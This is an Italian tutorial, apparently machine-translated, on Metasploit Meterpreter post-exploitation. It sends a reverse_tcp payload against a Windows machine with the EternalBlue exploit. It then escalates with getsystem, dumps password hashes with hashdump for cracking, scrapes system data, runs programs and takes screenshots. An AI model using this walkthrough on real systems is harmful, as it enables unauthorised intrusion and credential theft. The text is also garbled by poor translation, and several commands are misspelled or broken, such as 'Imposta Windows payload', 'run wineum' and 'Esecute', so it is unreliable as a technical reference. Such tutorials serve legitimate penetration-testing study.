Post sfruttamento con meterpreter

Post sfruttamento con meterpreter
Questa è un'introduzione al plug -in payload Meterpreter all'interno di Metasploit. In questo breve tutorial, discuteremo di come usarlo per applicare lo sfruttamento post a un sistema di sistema operativo Windows una volta che lo hai già violato usando EternalBlue Exploit. Ci limiteremo ad accedere al sistema Windows ed esplorarlo, e tutte le cose che faremo si concentreranno sull'accesso alle informazioni e alle credenziali dell'utente.

Introduzione a MeterPreter

MeterPreter è un payload di attacco nel framework Metasploit che consente al perpetratore di controllare e navigare nel computer della vittima attraverso una shell di comando. Può rivelarsi uno strumento molto versatile quando si tratta di test di penetrazione. È uno strumento post-sfruttamento che si basa sull'iniezione di DLL in memoria, il che significa che ottiene la DLL iniettata in esecuzione creando un nuovo processo che richiede che il sistema esegui la DLL iniettata. Può darti accesso a una shell di comando invisibile su una macchina per vittime, permettendo di eseguire eseguibili e reti di profilo.

È stato originariamente scritto per Metasploit 2.X ed è aggiornato per Metasploit 3.

Discuteremo in dettaglio gli usi di MeterPreter, ma prima, facciamo una parola sui payload in generale

Cosa sono i payload?

I payload in Metasploit sono moduli, il che significa che sono snippet di codici all'interno di Metasploit che vengono eseguiti sul sistema remoto. Il modulo di exploit viene inviato per primo, che installa il modulo payload sul sistema. Quindi il carico utile concede l'accesso all'attaccante (limitato o a pieno titolo, dipende dal contenuto del carico utile). Per elaborare ulteriormente il funzionamento dei payload, dobbiamo discutere i suoi tipi, che sono 3 in totale:

Single

Questi carichi utili sono completamente autonomi, il che significa che questi possono essere basibili quanto i codici gatekeeper che consentono all'utente di entrare in un sistema di destinazione.

Stager

Gli stager sono carichi utili che raccolgono applicazioni all'interno del sistema target e lo inviano all'attaccante. Stabilisce la connessione tra la vittima con la nostra macchina locale.

Fasi

Una volta che gli stager hanno accesso al sistema, scaricano i moduli delle fasi. Moduli stadi rimuovere il tappo di dimensioni sul meterpreter.

Esempi di fasi sarebbero una shell semplice, iPhone "ipwn" Shell, Moduli MeterPreter, Iniezione VNC.

Puoi capire il tipo di payload immaginando il suo nome. I singoli payload sono generalmente del formato /

Sfruttamento con MeterPreter

Prima di tutto, avviare la console MSF digitando il seguente comando terminale nella finestra del terminale Kali.

$ sudo msfconsole

Stiamo usando inverse_tcp come stager e meterpreter come stadio.

Inizieremo impostando l'eterno blu exploit. Seleziona (MS17_010_EternalBlue) quindi impostare Windows/x64/meterpreter/reverse_tcp come payload selezionato

Quindi, configurare le impostazioni di exploit, quindi eseguire Exploit con il comando Exploit:

$ Imposta Windows payload/x64/meterpreter/reverse_tcp
$ set rhost 192.168.198.136
$ exploit

IL EternalBlue Exploit è stato attivato con successo.

Post sfruttamento

Accediamo e manipoliamo il sistema già compromesso durante lo sfruttamento post-espulsione.

Possiamo fare molte cose ora che abbiamo accesso al sistema, ma come menzionato sopra, dobbiamo rimanere concentrati principalmente per il download di informazioni e l'ottenimento delle credenziali dell'utente qui

Gestione del privilegio di accesso:

A seconda del modulo payload e dell'exploit che hai usato, potresti trovarti di fronte a determinate restrizioni di accesso che paralizzano gravemente le tue capacità di manovrare la macchina da vittima. Puoi aggirare questo problema con l'escalation dei privilegi attraverso l'eliminazione delle password e la manomissione dei registri. Puoi anche intensificare i privilegi utilizzando il sistema Get System di MeterPreter.

$ getsystem
$ getUid

Trasferimento di file con meterpreter

Con MeterPreter, puoi scaricare un file utilizzando il comando $ download.

$ Download/Windows/System32/Driver/ETC/Host

Allo stesso modo, è possibile caricare anche informazioni sulla macchina, utilizzando $ upload-comando

Estrarre le credenziali dell'utente:

Utilizzare Codice Script Credential_Collector per estrarre le informazioni degli account utente o utilizzare il modulo di pubblicazione dump hash per effetto simile.

Useremo il modulo Hash Dump Post per procedere con la raccolta delle credenziali. Digita il seguente comando MSF.

$ run post/Windows/Gather/Hashdump

Come possiamo vedere, abbiamo ottenuto i conti Coen, Guest e Admin. L'Hash LM (amministratore) e l'hash NTLM (ospite) riguarda le password vuote, mentre l'hash Coen è una password di cui dovrai decifrare. Puoi farlo utilizzando una password cracker.

Automatizzare il raschiatura del sistema

Può essere noioso raccogliere informazioni con le singole dichiarazioni di input che devi continuare a alimentare la shell del comando. Convenientemente, è possibile automatizzare in qualche modo questo processo con il vigneto. Lo script raccoglie informazioni dalla vittima e scarica i dati nella nostra macchina locale. Ti verrà detto dove viene salvato l'output, come puoi vedere nella quarta riga dall'alto:

$ run wineum

Tieni presente che il percorso in cui è archiviato l'output per ciascun comando potrebbe essere diverso da quello al display qui.

Facciamo un casino un po 'di più

Eseguire i file

È possibile eseguire qualsiasi file sul sistema utilizzando: Esegui -f . Ciò include sia file e programmi eseguibili con più file di supporto. Ad esempio, per eseguire l'app Calcolatrice integrata nel sistema operativo Windows, digitare -f calc.exe

Prendendo screenshot

È inoltre possibile acquisire schermate dal punto di vista dell'utente. Basta digitare lo screenshot nella shell di comando di MeterPreter e otterrai uno screenshot del display sul sistema.

$ Esecute -f Calc.exe
$ screenshot

Conclusione:

Questa è stata una breve introduzione al plug -in Meterpreter nel framework Metasploit, insieme a una breve guida che mostra i suoi usi più basilari. Abbiamo imparato qui come possiamo violare un sistema di sistema operativo Windows con EternalBlue Exploit per ottenere l'accesso, quindi utilizzare MeterPreter per intensificare i privilegi, raccogliere informazioni manualmente e mediante automatizzare il comando Vineus. Abbiamo anche imparato a eseguire file sulla macchina per vittime.

MeterPreter può servire come mezzo apprezzabile di rilevamento della vulnerabilità, nonostante sia un conglomerato di strumenti di base all'interno del framework di Metasploit.